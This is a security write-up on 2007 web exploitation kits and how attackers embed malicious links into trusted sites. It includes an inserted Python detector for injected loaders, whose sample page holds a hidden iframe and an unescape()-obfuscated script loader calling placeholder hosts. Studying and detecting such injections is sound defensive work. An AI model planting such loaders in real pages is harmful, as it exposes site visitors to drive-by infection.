In this post I'll discuss the rise of Web malware exploitation kits circa 2007 and offer an in-depth discussion of the current and emerging tactics, techniques and procedures (TTPs) of the cybercriminals behind them. With cybercriminals continuing to rely on the exploitation of patched and outdated vulnerabilities, and with end users continuing to run unpatched and outdated third-party software, it shouldn't be surprising that today's botnets remain relatively easy to build and orchestrate for the purpose of committing financial fraud.
Malicious economies of scale means using attack techniques and exploitation approaches that infect or abuse as many victims as possible at the lowest cost and in the least time, combined with an added layer of improved metrics on the success of each campaign. What are the most popular web exploitation kits that malicious parties use to achieve this? Which vulnerabilities are used in the majority of the kits? What are the most popular techniques for embedding malware? This white paper will outline this efficiency-centered attack model, and will cover web application vulnerabilities, client-side vulnerabilities, malvertising and black hat SEO (search engine optimization).
An overview of the threats posed by the rising number of malware-embedding sites, with a discussion of the exploitation techniques and kits used, as well as detailed summaries of all high-profile attacks of this kind during 2007.
01. Reaching the Efficiency Scale Through a Diverse Set of Exploited Vulnerabilities
2007 was the year in which client-side vulnerabilities largely replaced server-side ones as the preferred choice of malicious attackers seeking the highest possible attack success rate while keeping their investment in know-how and personal effort to a minimum. Among the most successful such attacks during 2007 was Storm Worm, a perfect example of how the use of outdated and already-patched vulnerabilities can result in the world's largest botnet, according to industry and independent researchers' estimates. By itself, this attack technique directly contradicts the common wisdom that zero day vulnerabilities are more dangerous than already-patched ones; the gang behind Storm Worm, however, quickly recognized that assumption as false, and by standardizing the exploitation process around outdated vulnerabilities achieved enormous success.
Years ago, whenever a vulnerability was found and exploit code was released in the wild, malicious attackers would quickly release a do-it-yourself exploitation kit taking advantage of that single exploit only. Nowadays that's no longer the case: by using a single exploit, whether an outdated or a zero day one, they significantly limit the probability of a successful attack, so the more diverse the set of exploits served on the fly in an attack, the higher the success rate.
What was even more interesting to monitor during 2007 was the rise of high-profile sites serving malware, and the decline of malware coming from bogus ones. From the Massive Embedded Malware Attack at a large Italian ISP to the Bank of India, the Syrian Embassy in the U.K., the U.S. Consulate in St. Petersburg, China's CSIRT, Possibility Media's entire portfolio of E-zines, and the French government's site related to Libya, these trusted web sites were all found to serve malware through an embedded link pointing back to the attacker's malicious server. Let's clarify what malicious economies of scale means, and how it is achieved.
02. What is malicious economies of scale, and how is it achieved?
Malicious economies of scale is a term I coined in 2007 to summarize the ongoing trend of efficiently attacking online users by standardizing the exploitation process, and by doing so not just lowering the entry barriers to exploiting a large number of users, but also maintaining a rather static success rate of infections. Malicious economies of scale is the efficient way in which a large number of end users get infected, or are otherwise abused online, while the malicious parties maintain a static attack model. It is perhaps more important to describe how the process is achieved in the first place. The first strategy applies common sense to the most popular software applications present on the end user's side, and the first touch-point in this case is the end user's Internet browser.
Detecting the browser's version and serving the exploit that directly matches that vulnerable version is one of the main functions of a web exploitation kit. The second strategy is to increase the probability of success. As I've already pointed out, do-it-yourself single-vulnerability exploitation tools matured into web malware exploitation kits backed by a diverse set of exploits targeting different client-side applications, which is precisely how the probability of a successful infection is increased. The third strategy is to attract traffic to the malicious server, which, as already discussed, is automatically set up to anticipate the upcoming flood of users and serve the malware by exploiting client-side software vulnerabilities on their end. This is mainly done by exploiting remote file inclusion vulnerabilities within the high-profile targets, or other remotely exploitable web application vulnerabilities, to embed a single line of code or an obfuscated JavaScript that, when deobfuscated, loads the malicious URL while the legitimate site is loading.
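As an added example, not code from the original post, here is a small Python check a site owner could run over their own pages to spot the kind of embedded loader described above: a hidden iframe, a script tag pulling from a host the site does not own, or an unescape()-obfuscated document.write loader that hides one of the first two. The sample page, host names and indicator labels are constructed for the illustration.

```python
import re
from urllib.parse import unquote, urlparse

# Patterns for the three embedding forms the post describes: an iframe
# (usually hidden), an external script loader, and an unescape()-obfuscated
# document.write() loader whose payload hides one of the first two.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SCRIPT_SRC_RE = re.compile(r"<script\b[^>]*\bsrc\s*=\s*[\"']([^\"']+)", re.I)
UNESCAPE_RE = re.compile(r"unescape\(\s*[\"']([^\"']+)[\"']\s*\)", re.I)
SRC_RE = re.compile(r"\bsrc\s*=\s*[\"']([^\"']+)", re.I)
HIDDEN_RE = re.compile(
    r"(width|height)\s*=\s*[\"']?0\b|display\s*:\s*none|visibility\s*:\s*hidden", re.I)

def _is_foreign(url, trusted_hosts):
    """True when the URL points at a host the site owner does not control."""
    host = urlparse(url).hostname
    return bool(host) and host.lower() not in trusted_hosts

def find_injected_loaders(html, trusted_hosts, _depth=0):
    """Return (indicator, url) pairs; trusted_hosts are the site's own hostnames."""
    hits = []
    for tag in IFRAME_RE.findall(html):
        m = SRC_RE.search(tag)
        url = m.group(1) if m else ""
        if HIDDEN_RE.search(tag) or _is_foreign(url, trusted_hosts):
            hits.append(("hidden_or_foreign_iframe", url))
    for url in SCRIPT_SRC_RE.findall(html):
        if _is_foreign(url, trusted_hosts):
            hits.append(("foreign_script", url))
    # Decode unescape('%3C...') payloads and scan the decoded markup once more.
    if _depth < 1:
        for encoded in UNESCAPE_RE.findall(html):
            for kind, url in find_injected_loaders(unquote(encoded), trusted_hosts, 1):
                hits.append(("obfuscated_" + kind, url))
    return hits

# Constructed sample: a legitimate page with two injected loaders appended
# just before </body>, the pattern seen on the compromised sites named above.
SAMPLE_PAGE = """<html><body><h1>Welcome</h1>
<script src="https://www.example-bank.invalid/js/menu.js"></script>
<iframe src="http://loader.example.invalid/in.php" width="0" height="0"></iframe>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2Fcdn.example.invalid%2Fx.js%22%3E%3C%2Fscript%3E'));</script>
</body></html>"""

if __name__ == "__main__":
    for kind, url in find_injected_loaders(SAMPLE_PAGE, {"www.example-bank.invalid"}):
        print(kind, url)
```

The check is deliberately conservative: a visible, same-site iframe or a script served from one of the trusted hosts produces no finding, so it can run as a periodic integrity check without drowning the owner in noise.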
Popular Malware Embedded Attack Tactics
This part of the article will briefly describe some of the most common attack tactics malicious parties use to embed links to their malicious servers on either high-profile sites or any other site with a high PageRank, something they have recently started measuring, according to threat intelligence assessments of an automated system that embeds links based on a site's popularity.
- The “pull” Approach – Blackhat SEO, Harnessing the Trusted Audience of a Hacked Site
- The “push” Approach – Here’s Your Malware Embedded Link
- Automatically Exploiting Web Application Vulnerabilities – Mass SQL Injection Attacks
- Malicious Advertisements - Malvertising
Among the most popular traffic acquisition tactics today is the abuse of legitimate Web properties: either socially engineering an ad network provider into featuring a specific malware-serving advertisement on the targeted Web site, or compromising the Web site outright in order to inject rogue and malicious ads on the targeted host.
Thanks to a vibrant DIY (do-it-yourself) Web malware exploitation kit culture, including the active use of various DIY Web site exploitation and malware-generating kits, cybercriminals continue to use stolen and compromised accounting data to inject malicious scripts on the targeted host, further compromising its confidentiality, availability and integrity.
The Most Popular Web Malware Exploitation Kits
Going into detail about the most common vulnerabilities used in the multitude of web malware exploitation kits would be of limited value given their current state of "modularity": while the default installation of a kit contains a rather modest set of exploits, adding new exploits has long reached the point-and-click stage. Even worse, localizing the kits into different languages further contributes to their ease of use and acceptance on a large scale, as does their open source nature, which makes it easy for coders to use a successful kit's modules as the foundation for a new one. That is already happening, hence the distinction between a copycat kit and one coded from scratch. Among the most popular malware kits are:
- A Brief Overview of MPack, IcePack, Zunker, Advanced Pack and Fire Pack
The list is endless: the Nuclear Malware kit, Metaphisher, older versions of the WebAttacker and the Rootlauncher kit, with the latest and most advanced innovation being the Random JS Exploitation Kit. Compared to the previous ones, this kit goes a step beyond the usual centralized malicious server.
With malicious parties now interested in controlling as many infected hosts as possible with as little effort as possible, client-side vulnerabilities will continue to be abused efficiently through web malware exploitation kits in 2008. The events of 2007 clearly demonstrate the pragmatic attack approaches malicious parties have started applying, namely the realization that a vulnerability that is outdated but still unpatched on a large scale is just as valuable as a zero day one.